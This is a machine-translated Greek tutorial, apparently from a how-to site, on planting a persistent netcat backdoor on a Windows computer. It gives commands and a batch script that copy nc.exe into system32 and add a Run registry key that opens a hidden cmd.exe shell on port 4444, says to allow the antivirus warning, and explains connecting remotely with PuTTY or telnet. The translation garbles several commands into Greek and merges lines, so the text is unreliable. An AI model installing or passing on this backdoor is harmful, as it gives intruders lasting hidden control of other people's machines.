Netcat Fun!: 5 βήματα

2024 Συγγραφέας: John Day | [email protected]. Τελευταία τροποποίηση: 2024-01-30 08:38

Αυτό το διδακτικό σας δείχνει πώς να δημιουργήσετε μια πίσω πόρτα σε έναν υπολογιστή με netcat! Θα σας δείξω δύο τρόπους για να το κάνετε αυτό, με και χωρίς το αρχείο δέσμης που το αυτοματοποιεί για εσάς. Αυτό το διδακτικό υποθέτει ήδη ότι έχετε ήδη δικαιώματα root στον υπολογιστή, πιθανότατα με ένα 0phcrack LiveCD εδώ. Τώρα, στο οδηγό.

Βήμα 1: Λήψη Netcat

Σας έχω εξοικονομήσει τον κόπο 3 λεπτών αναζήτησης στο Google και σας έχω βάλει το nc.exe σε οδηγίες χρήσης για λήψη. Προαιρετικά, μπορείτε επίσης να κατεβάσετε το nc.bat που είναι ένα αρχείο δέσμης που έχω δημιουργήσει για να αυτοματοποιήσει τη διαδικασία για εσάς. Βεβαιωθείτε ότι εάν κατεβάσετε το nc.bat είναι 464 byte, γιατί συνέχισα να ανεβάζω εκδόσεις και διαπιστώνω ότι κάτι δεν πάει καλά με αυτό. Εάν δεν είναι 464 byte, το πρόγραμμα δεν θα αντιστοιχεί σε αυτό το εκπαιδευτικό.

Βήμα 2: Με το Nc.bat

Πρώτον, και τα δύο αρχεία πρέπει να βρίσκονται στον ίδιο κατάλογο για να λειτουργεί σωστά το nc.bat. Προτείνω να χρησιμοποιήσετε μια μονάδα flash ή CD-ROM για αυτήν τη λειτουργία. Χρησιμοποίησα μια μονάδα flash 512 mb geek squad για αυτό, αλλά αυτό είμαι μόνο εγώ. Έτσι, αντιγράψτε τα αρχεία στην εξωτερική σας συσκευή πολυμέσων και φέρτε τα στον υπολογιστή στον οποίο έχετε root. Μπείτε στη συσκευή πολυμέσων και κάντε διπλό κλικ στο nc.bat. Αυτό θα αντιγράψει το αρχείο nc.exe στο φάκελο system32, στη ρίζα συστήματος (συνήθως C: / Windows ή C: / WINNT) και θα κάνει τις απαραίτητες αλλαγές στο μητρώο. Στη συνέχεια, γράψτε τη διεύθυνση IP. Θα είναι κάτι σαν '192.168.1.103', το οποίο είναι δικό μου. Μόλις γίνει αυτό, επανεκκινήστε το μηχάνημα και συνδεθείτε. Στη συνέχεια, το πρόγραμμα προστασίας από ιούς μπορεί να σας ρωτήσει εάν θέλετε να επιτρέψετε/να μην επιτρέψετε το πρόγραμμα. Κάντε κλικ στο «Να επιτρέπεται» ή παρόμοιο. Λάβετε υπόψη ότι σε αυτό το οδηγό, μπορείτε να τηλεφωνείτε μόνο από το τοπικό δίκτυο αυτού του υπολογιστή. Στη συνέχεια, φύγετε ή αποσυνδεθείτε ή ότι άλλο θέλετε.

Βήμα 3: Χωρίς Nc.bat

Για να το κάνετε αυτό, πρέπει να έχετε το nc.exe σε CD ή μονάδα Flash. Μεταβείτε στον υπολογιστή, συνδεθείτε και συνδέστε τη μονάδα flash ή τοποθετήστε το CD σας. Από εδώ, υπάρχουν δύο τρόποι: Οι γυαλισμένες γραφικές διεπαφές χρήστη των παραθύρων ή ο βρώμικος, παλιομοδίτικος τρόπος της γραμμής εντολών. Ο βρώμικος, παλιομοδίτικος τρόπος γραμμής εντολών: Τραβήξτε τη γραμμή εντολών μεταβαίνοντας στο StartRun και πληκτρολογήστε:

cmd.exeΜεταβείτε στο φλας ή στη μονάδα CD. Εάν δεν γνωρίζετε ποια μονάδα δίσκου είναι ποια, κάντε δεξί κλικ στο κουμπί έναρξης και κάντε κλικ στην εξερεύνηση. Κάντε κλικ σε όλες τις μη τοπικές μονάδες δίσκου στο My Computer μέχρι να φτάσετε στη μονάδα flash/CD. Θυμηθείτε το γράμμα της μονάδας δίσκου και επιστρέψτε στη γραμμή εντολών. Πληκτρολογήστε το γράμμα της μονάδας δίσκου ακολουθούμενο από άνω και κάτω τελεία, όπως αυτό: K: Στη συνέχεια, πληκτρολογήστε μία γραμμή κάθε φορά, ακολουθούμενη από το πλήκτρο επιστροφής

αντιγραφή nc.exe%systemroot%\ system32 / nc.exereg προσθέστε HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "Αυτή ήταν σχεδόν η εγκατάσταση. Το μόνο που χρειάζεται να γνωρίζετε τώρα είναι η τοπική διεύθυνση IP, η οποία μπορεί εύκολα να βρεθεί πληκτρολογώντας την εντολή 'ipconfig' και αναζητώντας κάτι στον πίνακα όπως "192.168.1.103". Στη συνέχεια, επανεκκινήστε το μηχάνημα και συνδεθείτε ξανά. Το πρόγραμμα προστασίας από ιούς μπορεί να σας ρωτήσει εάν θέλετε να επιτρέψετε/απαγορεύσετε. Κάντε κλικ στο άδεια. Στη συνέχεια, μπορείτε να κάνετε ό, τι θέλετε με τον υπολογιστή. Οι στιλισμένες γραφικές διεπαφές των Windows Κάντε δεξί κλικ στο κουμπί έναρξης και κάντε κλικ στην εξερεύνηση. Κάντε κλικ σε όλες τις μη τοπικές μονάδες δίσκου στο My Computer μέχρι να φτάσετε στη μονάδα flash/CD. Στη συνέχεια, κάντε δεξί κλικ στο nc.exe και αντιγράψτε. Στη συνέχεια, μεταβείτε στη μονάδα δίσκου C και κάντε κλικ στο φάκελο Windows ή WINNT. Στη συνέχεια, μεταβείτε στο φάκελο system32 και επικολλήστε το αρχείο nc.exe. Κλείστε το και μεταβείτε στο StartRun. Πληκτρολογήστε regedit. Περιηγηθείτε στους φακέλους στη διεύθυνση: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Στη συνέχεια κάντε δεξί κλικ σε έναν κενό χώρο και μεταβείτε στην τιμή NewString Value. Πληκτρολογήστε ό, τι θέλετε για το όνομα, αλλά για την τιμή, πληκτρολογήστε

%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exeΑυτή ήταν σχεδόν η εγκατάσταση. Το μόνο που πρέπει να γνωρίζετε τώρα είναι η τοπική διεύθυνση IP, η οποία μπορεί εύκολα να βρεθεί πληκτρολογώντας την εντολή "ipconfig" στη γραμμή εντολών (StartRun: cmd.exe) και αναζητώντας κάτι στον πίνακα όπως "192.168.1.103". Στη συνέχεια, επανεκκινήστε το μηχάνημα και συνδεθείτε ξανά. Το πρόγραμμα προστασίας από ιούς μπορεί να σας ρωτήσει εάν θέλετε να επιτρέψετε/απαγορεύσετε. Κάντε κλικ στο άδεια. Στη συνέχεια, μπορείτε να κάνετε ό, τι θέλετε με τον υπολογιστή.

Βήμα 4: Επιστροφή στο

Μόλις το εγκαταστήσετε και θέλετε να αναλάβετε τον έλεγχο του κεντρικού υπολογιστή, ανοίξτε τη γραμμή εντολών ή PuTTY. Νομίζω ότι το PuTTY είναι φοβερό, οπότε θα σας αφήσω να το κατεβάσετε εδώ. Χρησιμοποιώντας το PuTTY Λήψη και ανοίξτε το PuTTY.exe. Κάντε κλικ στο πρωτόκολλο «ακατέργαστο». Στο πλαίσιο κειμένου θύρας #, πληκτρολογήστε 4444. Στο πλαίσιο "διεύθυνση κεντρικού υπολογιστή", πληκτρολογήστε τη διεύθυνση IP που καταγράψατε κατά την εγκατάσταση. Στη συνέχεια, πατήστε enter. Το PuTTY θα πρέπει να συνδεθεί στο πλαίσιο και θα λάβετε μια γραμμή εντολών. Χρησιμοποιώντας τη γραμμή εντολών Ανοίξτε τη γραμμή εντολών και πληκτρολογήστε "telnet 4444". Στη συνέχεια, πατήστε enter και θα πρέπει να λάβετε μια γραμμή εντολών. Αυτό θα σας επιτρέψει να κάνετε σχεδόν οτιδήποτε θέλετε στον υπολογιστή από απόσταση και μπορείτε να το κάνετε με έναν τοπικό λογαριασμό. Αρχίζει πραγματικά να γίνεται ενδιαφέρον όταν πηγαίνετε σε έναν υπολογιστή και μετά πηγαίνετε σε έναν άλλο υπολογιστή από αυτόν τον υπολογιστή, για να έχετε μια ολόκληρη αλυσίδα υπολογιστών συνδεδεμένων μεταξύ τους. Διασκεδάστε (νόμιμα)!

Βήμα 5: Πηγαίος κώδικας

Επειδή μου ζητήθηκε, θα βάλω τον πηγαίο κώδικα (για το αρχείο δέσμης) και θα εξηγήσω κάθε εντολή και τι κάνει. Να είσαι σε επιφύλαξη για! Αυτή είναι η τρέχουσα έκδοση του προγράμματος εγκατάστασης κατά παρτίδες. Εάν ο δικός σας είναι διαφορετικός, ο κωδικός θα διαφέρει.

@echo offcopy nc.exe%systemroot%\ system32 / nc.exeif errorlevel 0 πήγα να κάνω regeditgoto error: regeditreg add HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc exe -L -d -p 4444 -t -e cmd.exe "εάν το επίπεδο σφάλματος 0 πήγε ip: errorecho συνέβη κάτι απροσδόκητο και το πρόγραμμα πρέπει να εξέλθει. τέλος τέλος: ipecho γράψτε τη διεύθυνση IP από το tableipconfig: endecho end.echo κολλητική ταινία έξω.παύση@echo off-Το λέει να μην εμφανίζει τις εντολές κατά την εκτέλεση.copy nc.exe %systemroot %\ system32 / nc.exe-συνήθως αντιγράφει το netcat σε C: / WINDOWS / system32. Αυτό το καθιστά έτσι όταν επιστρέφετε, αντί να αλλάζετε συνεχώς καταλόγους, μπορείτε απλά να πληκτρολογήσετε "nc" για να ανοίξετε μια άλλη θύρα. If errorlevel 0 goto regedit-error checking. Εάν το αντίγραφο ήταν επιτυχές, συνεχίζει την επεξεργασία του μητρώου.goto error-Εάν εμφανίστηκε σφάλμα, μεταβείτε στην ετικέτα: error.:regedit- Μια ετικέτα, καθορίζοντας ότι όταν το πρόγραμμα λέει "goto regedit", πηγαίνετε εδώ.reg προσθέστε HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" -(υποτίθεται να είναι μία γραμμή) που προσθέτει το κλειδί μητρώου για επανεκκίνηση του προγράμματος κατά την επανεκκίνηση. /f σημαίνει αντικατάσταση υπάρχοντος κλειδιού, /v για όνομα κλειδιού, /d για δεδομένα. Οι υπόλοιπες ετικέτες εισάγονται για netcat. -Λ λέει να το επανεκκινήσετε κατά την έξοδο, ώστε να μην χρειάζεται να περιμένετε να επανεκκινήσει ο υπολογιστής. -ξέχασα -p 4444 καθορίζει τη θύρα #. -το ξέχασα -e cmd.exe κάνει την έναρξη της γραμμής εντολών σε απομακρυσμένη σύνδεση. εάν το επίπεδο σφάλματος 0 πήρα τον έλεγχο σφαλμάτων ip. Εάν η εκτέλεση πήγε στραβά, θα παραλείψει αυτήν τη γραμμή και θα κατέβει στο: error label.echo συνέβη κάτι απροσδόκητο και το πρόγραμμα πρέπει να βγει.-Λέει στο πρόγραμμα να εκτυπώσει "συνέβη κάτι απροσδόκητο και το πρόγραμμα πρέπει να βγει "στην οθόνη. πήγε στο τέλος-αν πήγε στο μήνυμα σφάλματος, κάτι πήγε στραβά και το πρόγραμμα πρέπει να κλείσει ούτως ή άλλως.:ip- Και πάλι, label.echo γράψτε τη διεύθυνση IP από τον πίνακα-Γράφει" γράψτε την IP διεύθυνση από τον πίνακα "στην οθόνη.ipconfig-Αυτή είναι μια εντολή που εκτυπώνει πληροφορίες σχετικά με τις ρυθμίσεις του τοπικού δικτύου (LAN): end-Label.echo τέλος.-γράφει" τέλος "στην οθόνη. -γράφει "κολλητική ταινία έξω" στην οθόνη. παύση-αυτή η εντολή διακόπτει προσωρινά το πρόγραμμα και περιμένει τον χρήστη να πατήσει ένα πλήκτρο. Σε αυτό το πρόγραμμα, περιμένει την είσοδο και μετά βγαίνει από το πρόγραμμα.